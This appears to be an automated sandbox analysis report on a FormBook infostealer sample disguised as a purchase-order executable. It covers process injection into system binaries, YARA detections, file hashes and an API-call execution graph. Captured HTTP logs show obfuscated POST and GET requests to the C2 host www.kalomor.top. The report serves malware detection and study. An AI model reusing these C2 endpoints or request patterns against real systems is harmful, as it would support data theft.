                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Ascii: 6X=stAvf0FTVkcosBpYiS2ShCahSHIXfyqmxrvJMQacuTiBsR882U2CReJ04ee+pveEDJrsveBjf1IeK15WCQxHD3rDycw4rKsh7vNxtoBkZVULn0O406Mm975gSpglxtPGiYgt3skEVNY+cHUu0UHZ3P/tsL5F5qKGWGXbni4VNrbfygb+v+eiQlcKOzuIa4WhfScsHjrKUT6suRizyavvWvU=
                    Sep 22, 2024 17:42:16.718717098 CEST | 309 | IN | HTTP/1.1 405 Not Allowed
                    Server: nginx/1.26.2
                    Date: Sun, 22 Sep 2024 15:42:16 GMT
                    Content-Type: text/html
                    Content-Length: 157
                    Connection: close
                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    31 | 192.168.2.4 | 49768 | 91.215.85.23 | 80 | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 22, 2024 17:42:18.544348001 CEST | 10835 | OUT | POST /1i25/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.kalomor.top
                    Origin: http://www.kalomor.top
                    Content-Length: 10299
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.kalomor.top/1i25/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Sep 22, 2024 17:42:19.238317013 CEST | 309 | IN | HTTP/1.1 405 Not Allowed
                    Server: nginx/1.26.2
                    Date: Sun, 22 Sep 2024 15:42:19 GMT
                    Content-Type: text/html
                    Content-Length: 157
                    Connection: close
                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    32 | 192.168.2.4 | 49769 | 91.215.85.23 | 80 | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 22, 2024 17:42:21.086118937 CEST | 481 | OUT | GET /1i25/?6X=hvoPcElTJ0Y3piwLtjSln1mmdkYNLw6anL/4ADmEhhaGoTcu5w6VaNtYttD808rfRbfsmOcnHjc3Cl4jYjdANHGjovYJiL0/kcRCteZsHg47/gztzPUw9dw=&_vft=vxWlbDi8ipa49jzp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.kalomor.top
                    Connection: close
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Sep 22, 2024 17:42:21.791749001 CEST | 236 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.2
                    Date: Sun, 22 Sep 2024 15:42:21 GMT
                    Content-Type: text/html
                    Content-Length: 11694
                    Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                    Connection: close
                    ETag: "66e176fd-2dae"
                    Accept-Ranges: bytes
                    Sep 22, 2024 17:42:21.791809082 CEST | 1236 | IN | (response body, first chunk)
                    Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" co


                    Target ID:0
                    Start time:11:39:16
                    Start date:22/09/2024
                    Path:C:\Users\user\Desktop\PO #86637.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\PO #86637.exe"
                    Imagebase:0x400000
                    File size:1'373'705 bytes
                    MD5 hash:7FE19C52241499F1A94815CA779701D2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:1
                    Start time:11:39:17
                    Start date:22/09/2024
                    Path:C:\Windows\SysWOW64\svchost.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\PO #86637.exe"
                    Imagebase:0xa90000
                    File size:46'504 bytes
                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1844812308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1844812308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1845706736.0000000003750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1845706736.0000000003750000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:true

                    Target ID:2
                    Start time:11:39:23
                    Start date:22/09/2024
                    Path:C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe"
                    Imagebase:0xbf0000
                    File size:140'800 bytes
                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3547926363.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3547926363.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    Target ID:3
                    Start time:11:39:27
                    Start date:22/09/2024
                    Path:C:\Windows\SysWOW64\at.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\SysWOW64\at.exe"
                    Imagebase:0xb20000
                    File size:25'088 bytes
                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3546549257.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3546549257.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3547928511.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3547928511.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Reputation:moderate
                    Has exited:false

                    Target ID:7
                    Start time:11:39:39
                    Start date:22/09/2024
                    Path:C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe"
                    Imagebase:0xbf0000
                    File size:140'800 bytes
                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3549663217.0000000005080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3549663217.0000000005080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    Target ID:8
                    Start time:11:40:02
                    Start date:22/09/2024
                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Imagebase:0x7ff6bf500000
                    File size:676'768 bytes
                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true


                      Execution Graph

                      Execution Coverage:3.3%
                      Dynamic/Decrypted Code Coverage:1%
                      Signature Coverage:4.2%
                      Total number of Nodes:1893
                      Total number of Limit Nodes:36
84588->84592 84589->84587 84589->84590 84590->84587 84590->84593 84591->84584 84591->84587 84591->84588 84591->84593 84592->84588 84592->84593 84593->84537 84647 411924 46 API calls 3 library calls 84593->84647 84595 41f595 84594->84595 84596 41f599 84594->84596 84595->84540 84672 416b04 84596->84672 84598 41f5bb _memmove 84599 41f5c2 FreeEnvironmentStringsW 84598->84599 84599->84540 84602 41f50b _wparse_cmdline 84600->84602 84601 41f54e _wparse_cmdline 84601->84543 84602->84601 84603 416b04 __malloc_crt 46 API calls 84602->84603 84603->84601 84605 41f2bc _wcslen 84604->84605 84609 41f2b4 84604->84609 84606 416b49 __calloc_crt 46 API calls 84605->84606 84611 41f2e0 _wcslen 84606->84611 84607 41f336 84679 413748 84607->84679 84609->84547 84610 416b49 __calloc_crt 46 API calls 84610->84611 84611->84607 84611->84609 84611->84610 84612 41f35c 84611->84612 84615 41f373 84611->84615 84678 41ef12 46 API calls _fseek 84611->84678 84613 413748 _free 46 API calls 84612->84613 84613->84609 84685 417ed3 84615->84685 84617 41f37f 84617->84547 84619 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 84618->84619 84621 411750 __IsNonwritableInCurrentImage 84619->84621 84704 41130a 51 API calls __cinit 84619->84704 84621->84551 84623 42e2f3 84622->84623 84624 40d6cc 84622->84624 84705 408f40 84624->84705 84626 40d707 84709 40ebb0 84626->84709 84629 40d737 84712 411951 84629->84712 84634 40d751 84724 40f4e0 SystemParametersInfoW SystemParametersInfoW 84634->84724 84636 40d75f 84725 40d590 GetCurrentDirectoryW 84636->84725 84638 40d767 SystemParametersInfoW 84639 40d794 84638->84639 84640 40d78d FreeLibrary 84638->84640 84641 408f40 VariantClear 84639->84641 84640->84639 84642 40d79d 84641->84642 84643 408f40 VariantClear 84642->84643 84644 40d7a6 84643->84644 84644->84556 84651 4118da 46 API calls _doexit 84644->84651 84645->84529 84646->84533 84651->84556 84652->84559 84653->84567 84654->84575 84657 416b52 84655->84657 84658 416b8f 84657->84658 84659 416b70 
Sleep 84657->84659 84663 41f677 84657->84663 84658->84573 84658->84578 84660 416b85 84659->84660 84660->84657 84660->84658 84661->84580 84662->84570 84664 41f683 84663->84664 84670 41f69e _malloc 84663->84670 84665 41f68f 84664->84665 84664->84670 84671 417f77 46 API calls __getptd_noexit 84665->84671 84667 41f6b1 HeapAlloc 84669 41f6d8 84667->84669 84667->84670 84668 41f694 84668->84657 84669->84657 84670->84667 84670->84669 84671->84668 84675 416b0d 84672->84675 84673 4135bb _malloc 45 API calls 84673->84675 84674 416b43 84674->84598 84675->84673 84675->84674 84676 416b24 Sleep 84675->84676 84677 416b39 84676->84677 84677->84674 84677->84675 84678->84611 84680 41377c _free 84679->84680 84681 413753 RtlFreeHeap 84679->84681 84680->84609 84681->84680 84682 413768 84681->84682 84688 417f77 46 API calls __getptd_noexit 84682->84688 84684 41376e GetLastError 84684->84680 84689 417daa 84685->84689 84688->84684 84690 417dc9 setSBUpLow __call_reportfault 84689->84690 84691 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 84690->84691 84694 417eb5 __call_reportfault 84691->84694 84693 417ed1 GetCurrentProcess TerminateProcess 84693->84617 84695 41a208 84694->84695 84696 41a210 84695->84696 84697 41a212 IsDebuggerPresent 84695->84697 84696->84693 84703 41fe19 84697->84703 84700 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 84701 421ff0 __call_reportfault 84700->84701 84702 421ff8 GetCurrentProcess TerminateProcess 84700->84702 84701->84702 84702->84693 84703->84700 84704->84621 84706 408f48 moneypunct 84705->84706 84707 4265c7 VariantClear 84706->84707 84708 408f55 moneypunct 84706->84708 84707->84708 84708->84626 84765 40ebd0 84709->84765 84769 4182cb 84712->84769 84714 41195e 84776 4181f2 LeaveCriticalSection 84714->84776 84716 40d748 84717 4119b0 84716->84717 84718 4119d6 84717->84718 84719 4119bc 84717->84719 84718->84634 84719->84718 84811 417f77 46 API calls __getptd_noexit 84719->84811 84721 4119c6 84812 417f25 10 API calls 
_fseek 84721->84812 84723 4119d1 84723->84634 84724->84636 84813 401f20 84725->84813 84727 40d5b6 IsDebuggerPresent 84728 40d5c4 84727->84728 84729 42e1bb MessageBoxA 84727->84729 84730 42e1d4 84728->84730 84731 40d5e3 84728->84731 84729->84730 84986 403a50 52 API calls 3 library calls 84730->84986 84883 40f520 84731->84883 84735 40d63b 84738 40d643 84735->84738 84739 42e231 SetCurrentDirectoryW 84735->84739 84736 40d5fd GetFullPathNameW 84895 401460 84736->84895 84740 40d64c 84738->84740 84987 432fee 6 API calls 84738->84987 84739->84738 84910 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 84740->84910 84743 42e252 84743->84740 84745 42e25a GetModuleFileNameW 84743->84745 84747 42e274 84745->84747 84748 42e2cb GetForegroundWindow ShellExecuteW 84745->84748 84988 401b10 84747->84988 84750 40d688 84748->84750 84749 40d656 84752 40d669 84749->84752 84984 40e0c0 74 API calls setSBUpLow 84749->84984 84756 40d692 SetCurrentDirectoryW 84750->84756 84918 4091e0 84752->84918 84756->84638 84759 42e28d 84995 40d200 52 API calls 2 library calls 84759->84995 84762 42e299 GetForegroundWindow ShellExecuteW 84763 42e2c6 84762->84763 84763->84750 84764 40ec00 LoadLibraryA GetProcAddress 84764->84629 84766 40d72e 84765->84766 84767 40ebd6 LoadLibraryA 84765->84767 84766->84629 84766->84764 84767->84766 84768 40ebe7 GetProcAddress 84767->84768 84768->84766 84770 4182e0 84769->84770 84771 4182f3 EnterCriticalSection 84769->84771 84777 418209 84770->84777 84771->84714 84773 4182e6 84773->84771 84804 411924 46 API calls 3 library calls 84773->84804 84776->84716 84778 418215 _fseek 84777->84778 84779 418225 84778->84779 84780 41823d 84778->84780 84805 418901 46 API calls __NMSG_WRITE 84779->84805 84782 416b04 __malloc_crt 45 API calls 84780->84782 84788 41824b _fseek 84780->84788 84784 418256 84782->84784 84783 41822a 84806 418752 46 API calls 8 library calls 84783->84806 84786 41825d 84784->84786 84787 41826c 84784->84787 84808 417f77 46 API calls __getptd_noexit 
84786->84808 84791 4182cb __lock 45 API calls 84787->84791 84788->84773 84789 418231 84807 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84789->84807 84793 418273 84791->84793 84795 4182a6 84793->84795 84796 41827b InitializeCriticalSectionAndSpinCount 84793->84796 84797 413748 _free 45 API calls 84795->84797 84798 418297 84796->84798 84799 41828b 84796->84799 84797->84798 84810 4182c2 LeaveCriticalSection _doexit 84798->84810 84800 413748 _free 45 API calls 84799->84800 84802 418291 84800->84802 84809 417f77 46 API calls __getptd_noexit 84802->84809 84805->84783 84806->84789 84808->84788 84809->84798 84810->84788 84811->84721 84812->84723 84996 40e6e0 84813->84996 84817 401f41 GetModuleFileNameW 85014 410100 84817->85014 84819 401f5c 85026 410960 84819->85026 84822 401b10 52 API calls 84823 401f81 84822->84823 85029 401980 84823->85029 84825 401f8e 84826 408f40 VariantClear 84825->84826 84827 401f9d 84826->84827 84828 401b10 52 API calls 84827->84828 84829 401fb4 84828->84829 84830 401980 53 API calls 84829->84830 84831 401fc3 84830->84831 84832 401b10 52 API calls 84831->84832 84833 401fd2 84832->84833 85037 40c2c0 84833->85037 84835 401fe1 84836 40bc70 52 API calls 84835->84836 84837 401ff3 84836->84837 85055 401a10 84837->85055 84839 401ffe 85062 4114ab 84839->85062 84842 428b05 84844 401a10 52 API calls 84842->84844 84843 402017 84845 4114ab __wcsicoll 58 API calls 84843->84845 84846 428b18 84844->84846 84847 402022 84845->84847 84849 401a10 52 API calls 84846->84849 84847->84846 84848 40202d 84847->84848 84850 4114ab __wcsicoll 58 API calls 84848->84850 84851 428b33 84849->84851 84852 402038 84850->84852 84854 428b3b GetModuleFileNameW 84851->84854 84853 402043 84852->84853 84852->84854 84855 4114ab __wcsicoll 58 API calls 84853->84855 84856 401a10 52 API calls 84854->84856 84857 40204e 84855->84857 84858 428b6c 84856->84858 84859 402092 84857->84859 84863 401a10 52 API calls 84857->84863 84868 428b90 _wcscpy 84857->84868 84860 
40e0a0 52 API calls 84858->84860 84862 4020a3 84859->84862 84859->84868 84861 428b7a 84860->84861 84864 401a10 52 API calls 84861->84864 84865 428bc6 84862->84865 85070 40e830 53 API calls 84862->85070 84866 402073 _wcscpy 84863->84866 84867 428b88 84864->84867 84873 401a10 52 API calls 84866->84873 84867->84868 84870 401a10 52 API calls 84868->84870 84878 4020d0 84870->84878 84871 4020bb 85071 40cf00 53 API calls 84871->85071 84873->84859 84874 4020c6 84875 408f40 VariantClear 84874->84875 84875->84878 84877 402110 84880 408f40 VariantClear 84877->84880 84878->84877 84881 401a10 52 API calls 84878->84881 85072 40cf00 53 API calls 84878->85072 85073 40e6a0 53 API calls 84878->85073 84882 402120 moneypunct 84880->84882 84881->84878 84882->84727 84884 4295c9 setSBUpLow 84883->84884 84885 40f53c 84883->84885 84887 4295d9 GetOpenFileNameW 84884->84887 85749 410120 84885->85749 84887->84885 84889 40d5f5 84887->84889 84888 40f545 85753 4102b0 SHGetMalloc 84888->85753 84889->84735 84889->84736 84891 40f54c 85758 410190 GetFullPathNameW 84891->85758 84893 40f559 85769 40f570 84893->85769 85831 402400 84895->85831 84897 40146f 84900 428c29 _wcscat 84897->84900 85840 401500 84897->85840 84899 40147c 84899->84900 85848 40d440 84899->85848 84902 401489 84902->84900 84903 401491 GetFullPathNameW 84902->84903 84904 402160 52 API calls 84903->84904 84905 4014bb 84904->84905 84906 402160 52 API calls 84905->84906 84907 4014c8 84906->84907 84907->84900 84908 402160 52 API calls 84907->84908 84909 4014ee 84908->84909 84909->84735 84911 428361 84910->84911 84912 4103fc LoadImageW RegisterClassExW 84910->84912 85919 44395e EnumResourceNamesW LoadImageW 84911->85919 85918 410490 7 API calls 84912->85918 84915 40d651 84917 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 84915->84917 84916 428368 84917->84749 84919 409202 84918->84919 84920 42d7ad 84918->84920 84978 409216 moneypunct 84919->84978 86056 410940 338 API calls 84919->86056 86059 45e737 90 API calls 3 library 
calls 84920->86059 84923 409386 84924 40939c 84923->84924 86057 40f190 10 API calls 84923->86057 84924->84750 84985 401000 Shell_NotifyIconW setSBUpLow 84924->84985 84926 4095b2 84926->84924 84928 4095bf 84926->84928 84927 409253 PeekMessageW 84927->84978 86058 401a50 338 API calls 84928->86058 84930 42d8cd Sleep 84930->84978 84931 4095c6 LockWindowUpdate DestroyWindow GetMessageW 84931->84924 84934 4095f9 84931->84934 84933 42e13b 86077 40d410 VariantClear 84933->86077 84937 42e158 TranslateMessage DispatchMessageW GetMessageW 84934->84937 84937->84937 84938 42e188 84937->84938 84938->84924 84940 409567 PeekMessageW 84940->84978 84942 46f3c1 107 API calls 84942->84978 84943 40e0a0 52 API calls 84943->84978 84944 46fdbf 108 API calls 84975 4094e0 84944->84975 84945 42dcd2 WaitForSingleObject 84952 42dcf0 GetExitCodeProcess CloseHandle 84945->84952 84945->84978 84946 409551 TranslateMessage DispatchMessageW 84946->84940 84949 44c29d 52 API calls 84949->84975 84950 42dd3d Sleep 84950->84975 84951 47d33e 316 API calls 84951->84978 86066 40d410 VariantClear 84952->86066 84955 4094cf Sleep 84955->84975 84957 42d94d timeGetTime 86062 465124 53 API calls 84957->86062 84959 40d410 VariantClear 84959->84978 84960 40c620 timeGetTime 84960->84975 84962 465124 53 API calls 84962->84975 84964 42dd89 CloseHandle 84964->84975 84966 42de19 GetExitCodeProcess CloseHandle 84966->84975 84967 401b10 52 API calls 84967->84975 84970 42de88 Sleep 84970->84978 84973 401980 53 API calls 84973->84975 84974 45e737 90 API calls 84974->84978 84975->84944 84975->84949 84975->84960 84975->84962 84975->84964 84975->84966 84975->84967 84975->84970 84975->84973 84975->84978 84983 408f40 VariantClear 84975->84983 86063 45178a 54 API calls 84975->86063 86064 47d33e 338 API calls 84975->86064 86065 453bc6 54 API calls 84975->86065 86067 40d410 VariantClear 84975->86067 86068 443d19 67 API calls _wcslen 84975->86068 86069 4574b4 VariantClear 84975->86069 86070 403cd0 84975->86070 86074 4731e1 
VariantClear 84975->86074 86075 4331a2 6 API calls 84975->86075 84978->84923 84978->84927 84978->84930 84978->84933 84978->84940 84978->84942 84978->84943 84978->84945 84978->84946 84978->84950 84978->84951 84978->84955 84978->84957 84978->84959 84978->84974 84978->84975 84979 42e0cc VariantClear 84978->84979 84980 408f40 VariantClear 84978->84980 85920 4091b0 84978->85920 85978 40afa0 84978->85978 86004 408fc0 84978->86004 86039 408cc0 84978->86039 86053 4096a0 338 API calls 4 library calls 84978->86053 86054 40d150 TranslateAcceleratorW 84978->86054 86055 40d170 IsDialogMessageW GetClassLongW 84978->86055 86060 465124 53 API calls 84978->86060 86061 40c620 timeGetTime 84978->86061 86076 40e270 VariantClear moneypunct 84978->86076 84979->84978 84980->84978 84983->84975 84984->84752 84985->84750 84986->84735 84987->84743 84989 401b16 _wcslen 84988->84989 84990 4115d7 52 API calls 84989->84990 84993 401b63 84989->84993 84991 401b4b _memmove 84990->84991 84992 4115d7 52 API calls 84991->84992 84992->84993 84994 40d200 52 API calls 2 library calls 84993->84994 84994->84759 84995->84762 84997 40bc70 52 API calls 84996->84997 84998 401f31 84997->84998 84999 402560 84998->84999 85000 40256d __write_nolock 84999->85000 85001 402160 52 API calls 85000->85001 85003 402593 85001->85003 85013 4025bd 85003->85013 85074 401c90 85003->85074 85004 4026f0 52 API calls 85004->85013 85005 4026a7 85006 401b10 52 API calls 85005->85006 85012 4026db 85005->85012 85008 4026d1 85006->85008 85007 401b10 52 API calls 85007->85013 85078 40d7c0 52 API calls 2 library calls 85008->85078 85009 401c90 52 API calls 85009->85013 85012->84817 85013->85004 85013->85005 85013->85007 85013->85009 85077 40d7c0 52 API calls 2 library calls 85013->85077 85079 40f760 85014->85079 85017 410118 85017->84819 85019 42805d 85020 42806a 85019->85020 85135 431e58 85019->85135 85022 413748 _free 46 API calls 85020->85022 85023 428078 85022->85023 85024 431e58 82 API calls 85023->85024 85025 428084 85024->85025 
85025->84819 85027 4115d7 52 API calls 85026->85027 85028 401f74 85027->85028 85028->84822 85030 4019a3 85029->85030 85034 401985 85029->85034 85031 4019b8 85030->85031 85030->85034 85738 403e10 53 API calls 85031->85738 85033 40199f 85033->84825 85034->85033 85737 403e10 53 API calls 85034->85737 85036 4019c4 85036->84825 85038 40c2c7 85037->85038 85039 40c30e 85037->85039 85042 40c2d3 85038->85042 85043 426c79 85038->85043 85040 40c315 85039->85040 85041 426c2b 85039->85041 85044 40c321 85040->85044 85045 426c5a 85040->85045 85047 426c4b 85041->85047 85048 426c2e 85041->85048 85739 403ea0 52 API calls __cinit 85042->85739 85744 4534e3 52 API calls 85043->85744 85740 403ea0 52 API calls __cinit 85044->85740 85743 4534e3 52 API calls 85045->85743 85742 4534e3 52 API calls 85047->85742 85053 40c2de 85048->85053 85741 4534e3 52 API calls 85048->85741 85053->84835 85056 401a30 85055->85056 85057 401a17 85055->85057 85059 402160 52 API calls 85056->85059 85058 401a2d 85057->85058 85745 403c30 52 API calls _memmove 85057->85745 85058->84839 85061 401a3d 85059->85061 85061->84839 85063 411523 85062->85063 85064 4114ba 85062->85064 85748 4113a8 58 API calls 3 library calls 85063->85748 85069 40200c 85064->85069 85746 417f77 46 API calls __getptd_noexit 85064->85746 85067 4114c6 85747 417f25 10 API calls _fseek 85067->85747 85069->84842 85069->84843 85070->84871 85071->84874 85072->84878 85073->84878 85075 4026f0 52 API calls 85074->85075 85076 401c97 85075->85076 85076->85003 85077->85013 85078->85012 85139 40f6f0 85079->85139 85081 40f77b _strcat moneypunct 85147 40f850 85081->85147 85086 427c2a 85176 414d04 85086->85176 85088 40f7fc 85088->85086 85089 40f804 85088->85089 85163 414a46 85089->85163 85094 40f80e 85094->85017 85098 4528bd 85094->85098 85095 427c59 85182 414fe2 85095->85182 85097 427c79 85099 4150d1 _fseek 81 API calls 85098->85099 85100 452930 85099->85100 85679 452719 85100->85679 85103 452948 85103->85019 85104 414d04 __fread_nolock 61 API calls 85105 
452966 85104->85105 85106 414d04 __fread_nolock 61 API calls 85105->85106 85107 452976 85106->85107 85108 414d04 __fread_nolock 61 API calls 85107->85108 85109 45298f 85108->85109 85110 414d04 __fread_nolock 61 API calls 85109->85110 85111 4529aa 85110->85111 85112 4150d1 _fseek 81 API calls 85111->85112 85113 4529c4 85112->85113 85114 4135bb _malloc 46 API calls 85113->85114 85115 4529cf 85114->85115 85116 4135bb _malloc 46 API calls 85115->85116 85117 4529db 85116->85117 85118 414d04 __fread_nolock 61 API calls 85117->85118 85119 4529ec 85118->85119 85120 44afef GetSystemTimeAsFileTime 85119->85120 85121 452a00 85120->85121 85122 452a36 85121->85122 85123 452a13 85121->85123 85124 452aa5 85122->85124 85125 452a3c 85122->85125 85126 413748 _free 46 API calls 85123->85126 85129 413748 _free 46 API calls 85124->85129 85685 44b1a9 85125->85685 85127 452a1c 85126->85127 85130 413748 _free 46 API calls 85127->85130 85132 452aa3 85129->85132 85133 452a25 85130->85133 85131 452a9d 85134 413748 _free 46 API calls 85131->85134 85132->85019 85133->85019 85134->85132 85136 431e64 85135->85136 85137 431e6a 85135->85137 85138 414a46 __fcloseall 82 API calls 85136->85138 85137->85020 85138->85137 85140 425de2 85139->85140 85141 40f6fc _wcslen 85139->85141 85140->85081 85142 40f710 WideCharToMultiByte 85141->85142 85143 40f756 85142->85143 85144 40f728 85142->85144 85143->85081 85145 4115d7 52 API calls 85144->85145 85146 40f735 WideCharToMultiByte 85145->85146 85146->85081 85149 40f85d setSBUpLow _strlen 85147->85149 85150 40f7ab 85149->85150 85195 414db8 85149->85195 85151 4149c2 85150->85151 85207 414904 85151->85207 85153 40f7e9 85153->85086 85154 40f5c0 85153->85154 85158 40f5cd _strcat __write_nolock _memmove 85154->85158 85155 414d04 __fread_nolock 61 API calls 85155->85158 85156 40f691 __tzset_nolock 85156->85088 85158->85155 85158->85156 85162 425d11 85158->85162 85295 4150d1 85158->85295 85159 4150d1 _fseek 81 API calls 85160 425d33 85159->85160 85161 414d04 
__fread_nolock 61 API calls 85160->85161 85161->85156 85162->85159 85164 414a52 _fseek 85163->85164 85165 414a64 85164->85165 85166 414a79 85164->85166 85435 417f77 46 API calls __getptd_noexit 85165->85435 85169 415471 __lock_file 47 API calls 85166->85169 85173 414a74 _fseek 85166->85173 85168 414a69 85436 417f25 10 API calls _fseek 85168->85436 85171 414a92 85169->85171 85419 4149d9 85171->85419 85173->85094 85504 414c76 85176->85504 85178 414d1c 85179 44afef 85178->85179 85672 442c5a 85179->85672 85181 44b00d 85181->85095 85183 414fee _fseek 85182->85183 85184 414ffa 85183->85184 85185 41500f 85183->85185 85676 417f77 46 API calls __getptd_noexit 85184->85676 85187 415471 __lock_file 47 API calls 85185->85187 85189 415017 85187->85189 85188 414fff 85677 417f25 10 API calls _fseek 85188->85677 85191 414e4e __ftell_nolock 51 API calls 85189->85191 85192 415024 85191->85192 85678 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 85192->85678 85194 41500a _fseek 85194->85097 85196 414dd6 85195->85196 85197 414deb 85195->85197 85204 417f77 46 API calls __getptd_noexit 85196->85204 85197->85196 85202 414df2 85197->85202 85199 414ddb 85205 417f25 10 API calls _fseek 85199->85205 85201 414de6 85201->85149 85202->85201 85206 418f98 77 API calls 6 library calls 85202->85206 85204->85199 85205->85201 85206->85201 